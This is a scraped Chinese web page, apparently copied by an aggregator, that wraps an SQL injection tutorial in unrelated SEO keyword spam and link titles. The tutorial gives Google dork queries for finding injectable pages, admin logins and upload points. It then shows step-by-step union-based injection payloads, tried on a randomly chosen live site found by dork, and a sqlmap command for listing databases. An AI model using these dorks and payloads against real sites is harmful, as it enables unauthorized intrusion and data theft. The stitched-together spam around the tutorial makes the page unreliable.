当前位置: 首页 > news >正文

网站快照查询外贸网站有哪些

网站快照查询,外贸网站有哪些,天津网站制作建设,wordpress视频悬停目录 一、信息收集 二、实战演示 三、使用sqlmap进行验证 四、总结 一、信息收集 1.查找带有ID传参的网站(可以查找sql注入漏洞) inurl:asp idxx 2.查找网站后台(多数有登陆框,可以查找弱口令,暴力破解等漏洞&…

目录

一、信息收集

二、实战演示

三、使用sqlmap进行验证

四、总结


一、信息收集

1.查找带有ID传参的网站(可以查找sql注入漏洞)
inurl:asp id=xx
2.查找网站后台(多数有登陆框,可以查找弱口令,暴力破解等漏洞)
site:http://xxxx.com “admin”
site:http://xx.com intext:管理
site:http://xx.com inurl:login
site:http://xx.com intitle:后台
3.查看上传漏洞
site:http://xx.com inurl:file
site:http://xx.com inurl:load
4.查找敏感文件
filetype:mdb|doc|xlsx|pdf

二、实战演示

1.谷歌语法搜索
inurl:php id=62
 

图片


随便点进一个带有id传参=62的网站,大概率存在SQL注入
 

图片


2.判断是否存在SQL注入漏洞,显示页面正常
id=62 and 1=1

图片


3.id=62 and 1=1显示页面不正常,已经肯定存在SQL注入
 

图片


4.查找列数
id=62 order by 10
发现列数是10
 

图片


5.查看回显点
id=111111 union select 1,2,3,4,5,6,7,8,9,10 from information_schema.tables where table_schema=database() limit 0,1-- qwe

图片

6.输出表名
id=111111 union select 1,2,3,4,5,6,table_name,8,9,10 from information_schema.tables where table_schema=database() limit 0,1-- qwe

图片

三、使用sqlmap进行验证

使用sqlmap命令查看库名
sqlmap.py -u url --dbs

图片

图片

四、总结

1.谷歌语法找到注入点
2.判断注入是否存在
3.查找列数
4.查找表名
5.使用sqlmap进行验证
这次实战记录很适合新手小白挖SRC,希望多多支持!

申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.

图片

没看够~?欢迎关注!

http://www.yayakq.cn/news/600386/

相关文章:

  • 上市企业网站建设2022年新闻摘抄十条简短
  • 学校文化建设的网站做智慧教室的网站
  • 什么可以用手机做网站广州做网站哪家公司好
  • 网站建设的主要技术指什么高端品牌网站建设集团
  • 2019年新电商法做网站创造力网站设计
  • 网站开发技术 下载河南企业建站系统信息
  • 云网站建设 优帮云个人网站建设方案书备案
  • 做电影下载网站成本网站几个数据库
  • 上海企业网站建设方案泉州seo顾问
  • 银川网站设计建设wordpress esc html x
  • 建设一个网站需要多少钱企业品牌策划推广方案
  • 手机百度免费下载游戏优化
  • 用ps做三网站横幅腾讯云企业官网建设
  • 射阳做网站多少钱平面设计教学视频
  • 怀化同城网站wordpress 图标上传
  • 乐云seo模板网站建设长春做网站好的公司
  • 南宁网站建设公司利润科技网站大全
  • 男女做暖暖的视频试看网站无锡信息网招聘
  • 猫扑网站开发的网络游戏外贸网站推广企业
  • 运输房产网站建设信誉好的大良网站建设
  • 嘉定网站设计制作报价合肥网站建设兼职
  • 网站后期维护费用多少wordpress 短代码嵌套
  • 上广东建设厅网站沾化网站建设
  • 兴远建设网站河北廊坊百度建站
  • 品牌网站建设熊掌号wordpress悬浮下拉
  • 品牌网站建设 结构页面设计word
  • 中职 网站建设与管理专门做婚庆的网站
  • 温州网站制作费用关键词seo排名公司
  • 茂名网站建设教做电影解析网站
  • 网站分类代码wordpress访问太慢